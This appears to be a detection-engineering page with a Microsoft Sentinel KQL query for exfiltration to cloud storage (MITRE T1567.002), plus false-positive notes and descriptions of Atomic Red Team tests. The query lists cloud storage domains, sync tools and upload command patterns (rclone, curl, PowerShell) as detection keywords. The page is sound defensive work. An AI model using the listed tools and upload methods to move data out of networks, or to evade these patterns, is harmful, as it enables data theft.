Detect Exfiltration to Cloud Storage in Microsoft Sentinel
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services such as Dropbox, Google Drive, OneDrive, MEGA, and Amazon S3 allow storage and retrieval of data over the Internet. Exfiltration to these services can blend with legitimate enterprise traffic, providing significant cover. Real-world threat actors including Akira, Leviathan, POLONIUM, LuminousMoth, Mustang Panda, and Kimsuky have all leveraged cloud storage for data theft. Rclone is the most commonly observed tool, used by multiple ransomware and espionage groups to automate bulk transfers to attacker-controlled cloud accounts.
MITRE ATT&CK
- Tactic
- Exfiltration
- Technique
- T1567 Exfiltration Over Web Service
- Sub-technique
- T1567.002 Exfiltration to Cloud Storage
- Canonical reference
- https://attack.mitre.org/techniques/T1567/002/
KQL Detection Query
let CloudStorageDomains = dynamic([
"dropbox.com", "dropboxapi.com", "content.dropboxapi.com", "api.dropboxapi.com",
"drive.google.com", "www.googleapis.com", "storage.googleapis.com", "oauth2.googleapis.com",
"graph.microsoft.com", "onedrive.live.com", "api.onedrive.com", "files.1drv.com",
"s3.amazonaws.com", "s3-us-east-1.amazonaws.com",
"mega.io", "mega.nz", "api.mega.co.nz",
"api.box.com", "upload.box.com"
]);
let CloudSyncBinaries = dynamic([
"rclone.exe", "rclone", "azcopy.exe", "azcopy",
"gsutil", "megaput", "megatools", "megacmd"
]);
// Signal 1: Large outbound transfers to known cloud storage endpoints
let LargeUploads = DeviceNetworkEvents
| where Timestamp > ago(24h)
| where RemoteUrl has_any (CloudStorageDomains)
| where BytesSent > 10485760
| project Timestamp, DeviceName, AccountName, RemoteUrl, RemoteIP, RemotePort,
BytesSent, InitiatingProcessFileName, InitiatingProcessCommandLine,
InitiatingProcessParentFileName, Signal = "LargeCloudUpload";
// Signal 2: Rclone or dedicated cloud sync tools executing
let CloudSyncTools = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName has_any (CloudSyncBinaries)
or ProcessCommandLine has_any (
"rclone copy", "rclone sync", "rclone move", "rclone mount",
"azcopy copy", "azcopy sync",
"gsutil cp", "gsutil rsync",
"aws s3 cp", "aws s3 sync",
":dropbox", ":gdrive", ":onedrive", "mega:", ":s3", ":box"
)
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine,
InitiatingProcessParentFileName, Signal = "CloudSyncTool";
// Signal 3: curl/wget/python uploading to cloud storage APIs
let ApiUploads = DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName in~ ("curl.exe", "curl", "wget.exe", "wget",
"python.exe", "python3", "python3.exe",
"powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any (CloudStorageDomains)
| where ProcessCommandLine has_any (
"-T ", "--upload-file", "-X PUT", "-X POST", "--data-binary",
"-d @", "upload", "put_file", "files_upload", "UploadFile",
"Invoke-RestMethod", "Invoke-WebRequest", "WebClient"
)
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine,
InitiatingProcessParentFileName, Signal = "CloudApiUpload";
union LargeUploads, CloudSyncTools, ApiUploads
| sort by Timestamp descDetects exfiltration to cloud storage services via three correlated signals: (1) large outbound byte transfers (>10MB) from endpoints to known cloud storage API domains using DeviceNetworkEvents, (2) execution of dedicated cloud sync tools such as rclone, azcopy, and gsutil with copy/sync subcommands, and (3) curl, wget, or scripting interpreters making HTTP PUT/POST requests directly to cloud storage API endpoints. Covers the full threat actor toolset observed in the wild including Rclone (Akira/Conti), LUNCHMONEY/Dropbox (Leviathan), and direct API uploads (POLONIUM/HEXANE).
Data Sources
Required Tables
False Positives & Tuning
- OneDrive, Google Drive, and Dropbox desktop sync clients generating large uploads during normal backup or file sync operations
- DevOps pipelines using rclone, azcopy, or gsutil for legitimate CI/CD artifact uploads to cloud storage
- Backup software (Veeam, Acronis, BackBlaze) transferring large volumes to cloud-hosted S3-compatible backends
- Data engineering workflows using gsutil or AWS CLI to transfer datasets between cloud and on-premise environments
- Security tools performing cloud storage integrity checks or automated threat intelligence feeds pulling from S3/GCS
Other platforms for T1567.002
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Rclone Exfiltration to Dropbox (Simulated with Local Filesystem Remote)
Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy' and the source path. A second Event ID 1 for the 'rclone config create' invocation with 'localtest local' arguments. Security Event ID 4688 if command line auditing is enabled.
- Test 2curl Upload to Cloud Storage API Endpoint
Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing 'content.dropboxapi.com', '-X POST', and '--data-binary'. Sysmon Event ID 3: Network Connection attempted to content.dropboxapi.com:443. The connection will fail due to invalid token but process and network events are generated.
- Test 3PowerShell Upload to OneDrive Graph API
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'graph.microsoft.com', 'Invoke-RestMethod', 'PUT', and 'content'. Sysmon Event ID 3: Network Connection to graph.microsoft.com:443. PowerShell ScriptBlock Log Event ID 4104 with the full upload script.
- Test 4Rclone Configuration File Drop and Cloud Remote Enumeration
Expected signal: Sysmon Event ID 11: File Create for %APPDATA%\rclone\rclone.conf. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'listremotes' and '--config'. Security Event ID 4688 (if enabled) capturing the rclone invocation. The rclone.conf file creation event is a high-fidelity indicator per the hunting query targeting this artifact.
References (12)
- https://attack.mitre.org/techniques/T1567/002/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md
- https://rclone.org/docs/
- https://www.secureworks.com/research/gold-sahara
- https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets
- https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/
- https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-LuminousMoth-creat5540-en-EN.pdf
- https://research.nccgroup.com/2021/06/15/responding-to-ransomware-rclone-and-the-many-flavors-of-data-exfiltration/
- https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/
- https://learn.microsoft.com/en-us/azure/storage/common/storage-ref-azcopy
- https://unit42.paloaltonetworks.com/stately-taurus-targets-myanmar-government/
- https://www.cisa.gov/sites/default/files/publications/AA21-291A.pdf
Unlock Pro Content
Get the full detection package for T1567.002 including response playbook, investigation guide, and atomic red team tests.